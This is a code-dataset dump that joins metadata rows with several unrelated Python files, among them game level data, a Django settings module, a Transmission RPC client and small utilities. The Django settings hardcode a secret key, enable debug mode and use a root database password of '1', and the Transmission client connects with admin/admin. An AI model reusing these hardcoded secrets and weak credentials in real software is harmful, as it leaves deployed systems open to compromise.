] | null | null | null | generated-sources/python-flask/mojang-status/openapi_server/controllers/default_controller.py | AsyncMC/Mojang-API-Libs | b01bbd2bce44bfa2b9ed705a128cf4ecda077916 | [
"Apache-2.0"
] | null | null | null | generated-sources/python-flask/mojang-status/openapi_server/controllers/default_controller.py | AsyncMC/Mojang-API-Libs | b01bbd2bce44bfa2b9ed705a128cf4ecda077916 | [
"Apache-2.0"
] | null | null | null | import connexion
import six
from openapi_server.com.github.asyncmc.mojang.status.python.flask.model.api_status import ApiStatus # noqa: E501
from openapi_server import util
def check_statuses(): # noqa: E501
"""Checks the Mojang service statuses
# noqa: E501
:rtype: List[Dict[str, ApiStatus]]
"""
return 'do some magic!'
| 20.647059 | 113 | 0.717949 | 47 | 351 | 5.276596 | 0.702128 | 0.096774 | 0.137097 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031469 | 0.185185 | 351 | 16 | 114 | 21.9375 | 0.835664 | 0.310541 | 0 | 0 | 0 | 0 | 0.063063 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.666667 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
4c0e19ae5e8d015877fb721ba0f3e111cbe01077 | 388 | py | Python | pysrc/mimelib/address.py | jeske/csla | 872de8354bcc85b1031600999636d30685503174 | [
"BSD-2-Clause"
] | 1 | 2017-05-05T01:41:33.000Z | 2017-05-05T01:41:33.000Z | pysrc/mimelib/address.py | jeske/csla | 872de8354bcc85b1031600999636d30685503174 | [
"BSD-2-Clause"
] | null | null | null | pysrc/mimelib/address.py | jeske/csla | 872de8354bcc85b1031600999636d30685503174 | [
"BSD-2-Clause"
] | null | null | null | # Copyright (C) 2001 Python Software Foundation
# Address parsing class, taken straight out of rfc822.py
from rfc822 import unquote, quote, parseaddr
from rfc822 import dump_address_pair
from rfc822 import AddrlistClass as _AddrlistClass
COMMASPACE = ', '
def getaddresses(fieldvalues):
all = COMMASPACE.join(fieldvalues)
a = _AddrlistClass(all)
return a.getaddrlist()
| 22.823529 | 56 | 0.768041 | 47 | 388 | 6.255319 | 0.702128 | 0.102041 | 0.163265 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049536 | 0.167526 | 388 | 16 | 57 | 24.25 | 0.860681 | 0.257732 | 0 | 0 | 0 | 0 | 0.007018 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.375 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
4c1201e3d3d9337369f64c65179cf4c80b946f03 | 2,518 | py | Python | Level/Level_3.py | imabigpig/Travel-Egypt | df2a52136a840c232406092406008205fb62efaa | [
"MIT"
] | 29 | 2019-08-02T16:58:04.000Z | 2022-02-09T05:09:22.000Z | Level/Level_3.py | hta218/Travel_Egypt | a42f22d8dd71c1ff05b1814516c49a68e688a7f5 | [
"MIT"
] | null | null | null | Level/Level_3.py | hta218/Travel_Egypt | a42f22d8dd71c1ff05b1814516c49a68e688a7f5 | [
"MIT"
] | null | null | null | import pygame
from character import Character
from copy import copy
block_00 = Character(0, 0, pygame.image.load('Map/Level 3/00.jpg'), {"x" : 0, "y" : 0})
block_01 = Character(1, 0, pygame.image.load('Map/Level 3/01.jpg'), {"x" : 1, "y" : 0})
block_02 = Character(2, 0, pygame.image.load('Map/Level 3/02.jpg'), {"x" : 2, "y" : 0})
block_03 = Character(3, 0, pygame.image.load('Map/Level 3/03.jpg'), {"x" : 3, "y" : 0})
block_10 = Character(0, 1, pygame.image.load('Map/Level 3/10.jpg'), {"x" : 0, "y" : 1})
block_11 = Character(1, 1, pygame.image.load('Map/Level 3/11.jpg'), {"x" : 1, "y" : 1})
block_12 = Character(2, 1, pygame.image.load('Map/Level 3/12.jpg'), {"x" : 2, "y" : 1})
block_13 = Character(3, 1, pygame.image.load('Map/Level 3/13.jpg'), {"x" : 3, "y" : 1})
block_20 = Character(0, 2, pygame.image.load('Map/Level 3/20.jpg'), {"x" : 0, "y" : 2})
block_21 = Character(1, 2, pygame.image.load('Map/Level 3/21.jpg'), {"x" : 1, "y" : 2})
block_22 = Character(2, 2, pygame.image.load('Map/Level 3/22.jpg'), {"x" : 2, "y" : 2})
block_23 = Character(3, 2, pygame.image.load('Map/Level 3/23.jpg'), {"x" : 3, "y" : 2})
block_31 = Character(1, 3, pygame.image.load('Map/Level 3/31.jpg'), {"x" : 1, "y" : 3})
block_32 = Character(2, 3, pygame.image.load('Map/Level 3/32.jpg'), {"x" : 2, "y" : 3})
block_33 = Character(3, 3, pygame.image.load('Map/Level 3/33.jpg'), {"x" : 3, "y" : 3})
level_3 = [
[block_00, block_01, block_02, block_03],
[block_10, block_11, block_12, block_13],
[block_20, block_21, block_22, block_23],
[None, block_31, block_32, block_33]
]
win = pygame.image.load('Map/Level 3/win.jpg')
win_click = pygame.image.load('Map/Level 3/win_click.jpg')
hint = pygame.image.load('Map/Level 3/hint.jpg')
sound_path = 'Sound/Level/Level 3.mp3'
class Level_3:
def __init__(self):
self.blocks = self.create_new_blocks()
self.win_images = [win, win_click, hint]
self.sound_path = sound_path
self.item_x = 720
self.item_y = 394
self.item_width = 160
self.item_height = 109
def create_new_blocks(self):
blocks = []
for y in range(4):
blocks.append([])
for x in range(4):
if level_3[y][x] is not None:
blocks[y].append(copy(level_3[y][x]))
print(blocks[y][x].x, blocks[y][x].y)
else:
blocks[y].append(None)
return blocks | 44.175439 | 87 | 0.576648 | 424 | 2,518 | 3.299528 | 0.153302 | 0.098642 | 0.192995 | 0.231594 | 0.323803 | 0.323803 | 0.306648 | 0 | 0 | 0 | 0 | 0.096361 | 0.225179 | 2,518 | 57 | 88 | 44.175439 | 0.620707 | 0 | 0 | 0 | 0 | 0 | 0.153632 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.0625 | 0 | 0.145833 | 0.020833 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4c1419182124b1671784f5fe5457aed71b403ebb | 451 | py | Python | applications/ConvectionDiffusionApplication/test_examples/square.gid/rotatingcone_PureConvection_build_reference.py | lkusch/Kratos | e8072d8e24ab6f312765185b19d439f01ab7b27b | [
"BSD-4-Clause"
] | 778 | 2017-01-27T16:29:17.000Z | 2022-03-30T03:01:51.000Z | applications/ConvectionDiffusionApplication/test_examples/square.gid/rotatingcone_PureConvection_build_reference.py | lkusch/Kratos | e8072d8e24ab6f312765185b19d439f01ab7b27b | [
"BSD-4-Clause"
] | 6,634 | 2017-01-15T22:56:13.000Z | 2022-03-31T15:03:36.000Z | applications/ConvectionDiffusionApplication/test_examples/square.gid/rotatingcone_PureConvection_build_reference.py | lkusch/Kratos | e8072d8e24ab6f312765185b19d439f01ab7b27b | [
"BSD-4-Clause"
] | 224 | 2017-02-07T14:12:49.000Z | 2022-03-06T23:09:34.000Z | from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7
import sys
kratos_benchmarking_path = '../../../../benchmarking'
sys.path.append(kratos_benchmarking_path)
import benchmarking
print("Building reference data for rotatingcone_PureConvection.py...")
benchmarking.BuildReferenceData("rotatingcone_PureConvectionBenchmarking.py", "rotatingcone_PureConvection_ref.txt")
| 50.111111 | 134 | 0.838137 | 50 | 451 | 7.28 | 0.66 | 0.098901 | 0.120879 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009524 | 0.068736 | 451 | 8 | 135 | 56.375 | 0.857143 | 0.150776 | 0 | 0 | 0 | 0 | 0.424084 | 0.350785 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.428571 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
4c1e8fa0b115af097b56374f55e84b72c0ca855c | 388 | py | Python | src/torrents/utils.py | yigitgenc/bulkstash | 44ed74cd5c70e8b833736d594d3bbb5e5293d37c | [
"MIT"
] | 11 | 2017-11-24T12:38:48.000Z | 2019-08-31T14:29:11.000Z | src/torrents/utils.py | yigitgenc/kuzgun.io | 44ed74cd5c70e8b833736d594d3bbb5e5293d37c | [
"MIT"
] | null | null | null | src/torrents/utils.py | yigitgenc/kuzgun.io | 44ed74cd5c70e8b833736d594d3bbb5e5293d37c | [
"MIT"
] | null | null | null | from transmissionrpc import Client
class TransmissionRPC(Client):
"""
TransmissionRPC class that extends Client.
"""
def add_torrent(self, torrent, timeout=None, **kwargs):
return self.get_torrent(super(TransmissionRPC, self).add_torrent(torrent, timeout, **kwargs).id)
transmission = TransmissionRPC('transmission', user='admin', password='admin', port=9091)
| 29.846154 | 104 | 0.729381 | 42 | 388 | 6.666667 | 0.571429 | 0.071429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012085 | 0.146907 | 388 | 12 | 105 | 32.333333 | 0.833837 | 0.108247 | 0 | 0 | 0 | 0 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0.2 | 0.2 | 0.2 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 2 |
4c245d85ad961e446261f4d05bed43d5e85f978c | 6,949 | py | Python | MMMaker/conf/settings.py | C4Ution/MMMaker | 7e64b50abb2257c02618d5a5b3323a1e2993fe8a | [
"MIT"
] | 9 | 2020-05-23T04:50:18.000Z | 2020-12-19T05:16:39.000Z | MMMaker/conf/settings.py | C4Ution/MMMaker | 7e64b50abb2257c02618d5a5b3323a1e2993fe8a | [
"MIT"
] | 13 | 2020-05-23T12:01:08.000Z | 2022-02-10T10:31:18.000Z | MMMaker/conf/settings.py | C4Ution/MMMaker | 7e64b50abb2257c02618d5a5b3323a1e2993fe8a | [
"MIT"
] | 5 | 2020-07-02T11:44:56.000Z | 2021-07-10T03:19:17.000Z | """
Django settings for MMMaker project.
Generated by 'django-admin startproject' using Django 2.2.12.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '09k*&9q6lqu$@yamfhtg9t&w)n_)6y%i6d%vjw_59=5rsf5e@s'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', 'localhost', 'mmmaker.kro.kr']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'storages',
'boto3',
'django_extensions',
'app.memes',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'conf.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'conf.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'mmmaker',
'USER': 'root',
'PASSWORD': '1',
'HOST': '127.0.0.1',
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
BROKER_URL = 'amqp://kidsnote:kidsnote@127.0.0.1:5672/default'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
STATIC_ROOT = os.path.join(BASE_DIR, '../static/')
if DEBUG:
STATIC_URL = '/static/'
else:
CUSTOM_DOMAIN = 'https://mmmaker2.s3.ap-northeast-2.amazonaws.com/{}'
AWS_REGION = 'ap-northeast-2'
AWS_S3_REGION_NAME = 'ap-northeast-2'
AWS_STORAGE_BUCKET_NAME = 'mmmaker2'
AWS_QUERYSTRING_AUTH = False
AWS_S3_HOST = 's3.{}.amazonaws.com'.format(AWS_STORAGE_BUCKET_NAME)
AWS_ACCESS_KEY_ID = ''
AWS_SECRET_ACCESS_KEY = ''
AWS_S3_CUSTOM_DOMAIN = '{}.s3.amazonaws.com'.format(AWS_STORAGE_BUCKET_NAME)
AWS_S3_OBJECT_PARAMETERS = {
'CacheControl': 'max-age=86400'
}
AWS_LOCATION = 'static'
# STATIC_URL = "http://{}/".format(AWS_S3_CUSTOM_DOMAIN)
STATICFILES_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'
STATICFILES_LOCATION = 'static'
# MEDIA_URL = 'http://{}/'.format(AWS_S3_CUSTOM_DOMAIN)
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'
MEDIAFILES_LOCATION = 'media'
AWS_DEFAULT_ACL = None
S3DIRECT_DESTINATIONS = {
'example_destination': {
# "key" [required] The location to upload file
# 1. String: folder path to upload to
# 2. Function: generate folder path + filename using a function
'key': 'uploads/images',
# "auth" [optional] Limit to specfic Django users
# Function: ACL function
'auth': lambda u: u.is_staff,
# "allowed" [optional] Limit to specific mime types
# List: list of mime types
'allowed': ['image/jpeg', 'image/png', 'video/mp4'],
# "bucket" [optional] Bucket if different from AWS_STORAGE_BUCKET_NAME
# String: bucket name
'bucket': 'mmmaker2',
# "endpoint" [optional] Endpoint if different from AWS_S3_ENDPOINT_URL
# String: endpoint URL
'endpoint': 'http://mmmaker2.s3-website.ap-northeast-2.amazonaws.com',
# "region" [optional] Region if different from AWS_S3_REGION_NAME
# String: region name
'region': 'ap-northeast-2', # Default is 'AWS_S3_REGION_NAME'
# "acl" [optional] Custom ACL for object, default is 'public-read'
# String: ACL
'acl': 'private',
# "cache_control" [optional] Custom cache control header
# String: header
'cache_control': 'max-age=2592000',
# "content_disposition" [optional] Custom content disposition header
# String: header
'content_disposition': lambda x: 'attachment; filename="{}"'.format(x),
# "content_length_range" [optional] Limit file size
# Tuple: (from, to) in bytes
'content_length_range': (5000, 20000000),
# "server_side_encryption" [optional] Use serverside encryption
# String: encrytion standard
'server_side_encryption': 'AES256',
# "allow_existence_optimization" [optional] Checks to see if file already exists,
# returns the URL to the object if so (no upload)
# Boolean: True, False
'allow_existence_optimization': False,
},
'example_destination_two': {
'key': lambda filename, args: args + '/' + filename,
'key_args': 'uploads/images',
}
}
APPEND_SLASH = True
| 31.443439 | 93 | 0.629155 | 752 | 6,949 | 5.656915 | 0.356383 | 0.045839 | 0.036201 | 0.041138 | 0.197461 | 0.14457 | 0.097085 | 0.082981 | 0.048425 | 0 | 0 | 0.022953 | 0.247662 | 6,949 | 220 | 94 | 31.586364 | 0.790742 | 0.350698 | 0 | 0 | 1 | 0 | 0.440583 | 0.273094 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.050847 | 0.008475 | 0 | 0.008475 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
4c3bf361ecfcd774e9192c9b0e626503a753963e | 754 | py | Python | source/codes/prepare_Helsinki_layer.py | awilkins/CSC18 | 7467011446f67efb679ab7b04b9196e6ed57202c | [
"MIT"
] | 78 | 2018-01-12T13:58:21.000Z | 2022-03-12T10:32:39.000Z | source/codes/prepare_Helsinki_layer.py | mullenkamp/ecan_python_courses | 917a8fffd27e11d99444bd0f7e5213c0f848f6fd | [
"MIT"
] | 10 | 2019-01-27T16:48:31.000Z | 2020-06-13T20:15:58.000Z | source/codes/prepare_Helsinki_layer.py | mullenkamp/ecan_python_courses | 917a8fffd27e11d99444bd0f7e5213c0f848f6fd | [
"MIT"
] | 63 | 2018-01-16T09:10:59.000Z | 2022-02-05T06:06:06.000Z | # -*- coding: utf-8 -*-
"""
Prepare Helsinki municipality borders for the lesson
Created on Sun Nov 20 12:17:04 2016
@author: tenkahen
"""
import geopandas as gpd
from fiona.crs import from_epsg
# For this classification we will be using a different dataset that represents the accessibility
# (measured as travel times / distances) in Helsinki Region to city center
fp = r"D:\KOODIT\Opetus\Automating-GIS-processes\AutoGIS-Sphinx\data\paituli_89425282\mml\hallintorajat_10k\2016\SuomenKuntajako_2016_10k.shp"
# Read the Shapefile
data = gpd.read_file(fp)
# Select Helsinki
hel = data.ix[data['NAMEFIN'] == 'Helsinki']
# Save to disk
outfp = r"D:\KOODIT\Opetus\Automating-GIS-processes\AutoGIS-Sphinx\data\Helsinki_borders.shp"
hel.to_file(outfp)
| 30.16 | 142 | 0.77321 | 114 | 754 | 5.04386 | 0.684211 | 0.006957 | 0.027826 | 0.048696 | 0.184348 | 0.184348 | 0.184348 | 0.184348 | 0.184348 | 0.184348 | 0 | 0.049849 | 0.122016 | 754 | 24 | 143 | 31.416667 | 0.818731 | 0.461538 | 0 | 0 | 0 | 0.285714 | 0.589286 | 0.55102 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4c3e1456406c68225f73752c0151c9dcb1405c46 | 486 | py | Python | {{ cookiecutter.service_name }}/src/api/endpoints.py | nikkkkhil/cutter_template | 5b3a19ef83c72e73ed8700fe718612e7c73789ad | [
"MIT"
] | 1 | 2020-01-16T13:50:35.000Z | 2020-01-16T13:50:35.000Z | {{ cookiecutter.service_name }}/src/api/endpoints.py | nikkkkhil/cutter_template | 5b3a19ef83c72e73ed8700fe718612e7c73789ad | [
"MIT"
] | null | null | null | {{ cookiecutter.service_name }}/src/api/endpoints.py | nikkkkhil/cutter_template | 5b3a19ef83c72e73ed8700fe718612e7c73789ad | [
"MIT"
] | null | null | null | import os
from flask import Blueprint
from flask import request
from http import HTTPStatus
import json
from api.operations import health_check
from config import BASE_DIR
from config import logger
# Define blueprint
_api = Blueprint('_api', __name__)
# Health check
@_api.route('/{{ cookiecutter.service_name }}/health', methods=['GET'])
@construct_response
def _health_check():
"""Health check."""
# Get list of experiments
results = health_check()
return results
| 21.130435 | 71 | 0.753086 | 63 | 486 | 5.587302 | 0.507937 | 0.15625 | 0.085227 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158436 | 486 | 22 | 72 | 22.090909 | 0.860636 | 0.139918 | 0 | 0 | 0 | 0 | 0.112195 | 0.060976 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.571429 | 0 | 0.714286 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
4c41f37e03bffbdbb7b10a53ad7b371a276a84db | 3,484 | py | Python | tools37/Table.py | GabrielAmare/Tools37 | 5f2fe5a9b303a52442d0b808d39a1ae1c501a49d | [
"MIT"
] | null | null | null | tools37/Table.py | GabrielAmare/Tools37 | 5f2fe5a9b303a52442d0b808d39a1ae1c501a49d | [
"MIT"
] | null | null | null | tools37/Table.py | GabrielAmare/Tools37 | 5f2fe5a9b303a52442d0b808d39a1ae1c501a49d | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
from typing import List, Generic, TypeVar
E = TypeVar('E')
class TableInterface(Generic[E], ABC):
@abstractmethod
def append_row(self, elements: List[E]) -> None:
""""""
@abstractmethod
def remove_row(self, index: int) -> None:
""""""
@abstractmethod
def insert_row(self, index: int, elements: List[E]) -> None:
""""""
@abstractmethod
def set_row(self, index: int, elements: List[E]) -> None:
""""""
@abstractmethod
def get_row(self, index: int) -> List[E]:
""""""
@abstractmethod
def pop_row(self, index: int) -> List[E]:
""""""
@abstractmethod
def append_col(self, elements: List[E]) -> None:
""""""
@abstractmethod
def remove_col(self, index: int) -> None:
""""""
@abstractmethod
def insert_col(self, index: int, elements: List[E]) -> None:
""""""
@abstractmethod
def set_col(self, index: int, elements: List[E]) -> None:
""""""
@abstractmethod
def get_col(self, index: int) -> List[E]:
""""""
@abstractmethod
def pop_col(self, index: int) -> List[E]:
""""""
class Table(Generic[E], TableInterface[E]):
@classmethod
def sized(cls, n_rows: int, n_cols: int, default: E = None):
return cls([
[
default
for i_col in range(n_cols)
]
for i_row in range(n_rows)
])
def __init__(self, data: List[List[E]]):
assert len(set(map(len, data))) == 1
self.data: List[List[E]] = data
self.n_rows: int = len(data)
self.n_cols: int = len(data[0])
def append_row(self, elements: List[E]) -> None:
assert len(elements) == self.n_cols
self.data.append(elements)
self.n_rows += 1
def remove_row(self, index: int) -> None:
del self.data[index]
self.n_rows -= 1
def insert_row(self, index: int, elements: List[E]) -> None:
assert len(elements) == self.n_cols
self.data.insert(index, elements)
self.n_rows += 1
def set_row(self, index: int, elements: List[E]) -> None:
assert len(elements) == self.n_cols
self.data[index] = elements
def get_row(self, index: int) -> List[E]:
return self.data[index]
def pop_row(self, index: int) -> List[E]:
elements = self.data.pop(index)
self.n_rows -= 1
return elements
def append_col(self, elements: List[E]) -> None:
assert len(elements) == self.n_rows
for row, element in zip(self.data, elements):
row.append(element)
self.n_cols += 1
def remove_col(self, index: int) -> None:
for row in self.data:
del row[index]
def insert_col(self, index: int, elements: List[E]) -> None:
assert len(elements) == self.n_rows
for row, element in zip(self.data, elements):
row.insert(index, element)
self.n_cols += 1
def set_col(self, index: int, elements: List[E]) -> None:
assert len(elements) == self.n_rows
for row, element in zip(self.data, elements):
row[index] = element
def get_col(self, index: int) -> List[E]:
return [row[index] for row in self.data]
def pop_col(self, index: int) -> List[E]:
elements = [row.pop(index) for row in self.data]
self.n_cols -= 1
return elements
| 27.21875 | 64 | 0.562859 | 457 | 3,484 | 4.183807 | 0.105033 | 0.057531 | 0.125523 | 0.106695 | 0.749477 | 0.707636 | 0.634414 | 0.570607 | 0.375 | 0.375 | 0 | 0.003647 | 0.291619 | 3,484 | 127 | 65 | 27.433071 | 0.77107 | 0 | 0 | 0.616279 | 0 | 0 | 0.000293 | 0 | 0 | 0 | 0 | 0 | 0.081395 | 1 | 0.302326 | false | 0 | 0.023256 | 0.034884 | 0.406977 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4c4e853ced78af4f8eaa28bb0762dd21a6ad3e40 | 103 | py | Python | hello.py | jrl2ek/cs3240-labdemo | 5073be06f89a794d634b08b75715cb536fb551e3 | [
"MIT"
] | null | null | null | hello.py | jrl2ek/cs3240-labdemo | 5073be06f89a794d634b08b75715cb536fb551e3 | [
"MIT"
] | null | null | null | hello.py | jrl2ek/cs3240-labdemo | 5073be06f89a794d634b08b75715cb536fb551e3 | [
"MIT"
] | null | null | null | from helper import *
if __name__ == "__main__":
msg = 'hello'
greeting(msg)
print('edit')
| 14.714286 | 26 | 0.601942 | 12 | 103 | 4.5 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.252427 | 103 | 6 | 27 | 17.166667 | 0.701299 | 0 | 0 | 0 | 0 | 0 | 0.165049 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.2 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4c51c889a89af8e93f4bbda322a4cb180af7b8a5 | 964 | py | Python | courses/backend/django-for-everybody/Web Application Technologies and Django/resources/dj4e-samples/cats/meow.py | Nahid-Hassan/fullstack-software-development | 892ffb33e46795061ea63378279a6469de317b1a | [
"CC0-1.0"
] | 297 | 2019-01-25T08:44:08.000Z | 2022-03-29T18:46:08.000Z | courses/backend/django-for-everybody/Web Application Technologies and Django/resources/dj4e-samples/cats/meow.py | Nahid-Hassan/fullstack-software-development | 892ffb33e46795061ea63378279a6469de317b1a | [
"CC0-1.0"
] | 22 | 2019-05-06T14:21:04.000Z | 2022-02-21T10:05:25.000Z | courses/backend/django-for-everybody/Web Application Technologies and Django/resources/dj4e-samples/cats/meow.py | Nahid-Hassan/fullstack-software-development | 892ffb33e46795061ea63378279a6469de317b1a | [
"CC0-1.0"
] | 412 | 2019-02-12T20:44:43.000Z | 2022-03-30T04:23:25.000Z | import random
from random import randrange
breedstr = '''Persian
Siamese
Sphinx
Burmese
Tabby
Manx'''
namestr='''Bella
Kitty
Lily
Lilly
Charlie
Lucy
Leo
Milo
Jack
Nala
Sam
Simba
Chloe
Baby
Sadie
Ziggy
Princess
Salem
Sophie
Shadow
Izzy
Cleo
Boots
Loki
Daisy
Cooper
Missy
Oreo
Tiger
Lulu
Tucker
Jasmine
Jackson
Murphy
Pepper
Fiona
Jax
Frank
Romeo
Millie
Abby
Minnie
Olivia
Lola
Athena
Teddy
Ruby
Oscar
Bear
Moose
Pumpkin
Willow
Mittens
Coco
Penny
Sammy
Sammie
Theo
Kali
Bob
Clyde
Tigger
Buddy
Joey
Emma
Ollie
Toby
George
Marley
Bagheera
Belle
Binx
Boo
Ash
Scout
Gizmo
Louie
Ginger
Midnight
Mochi
Blue
Frankie
Rosie
Ella
Calvin
Lucky
Hazel
Thor
Gus
Maggie
Piper
Harley
Rocky
Peanut
Mimi
Kitten
Remy
Remi
Annie
Sunny
Layla
Leila
Riley
Walter
'''
names = namestr.split()
breeds = breedstr.split()
cats = list()
for name in names:
cat = name+','+random.choice(breeds)+','+str(6.0+randrange(40)/10.0)
cats.append(cat)
for cat in sorted(cats):
print(cat)
| 7.590551 | 72 | 0.778008 | 152 | 964 | 4.934211 | 0.881579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008685 | 0.1639 | 964 | 126 | 73 | 7.650794 | 0.921836 | 0 | 0 | 0 | 0 | 0 | 0.692946 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.016529 | 0 | 0.016529 | 0.008264 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
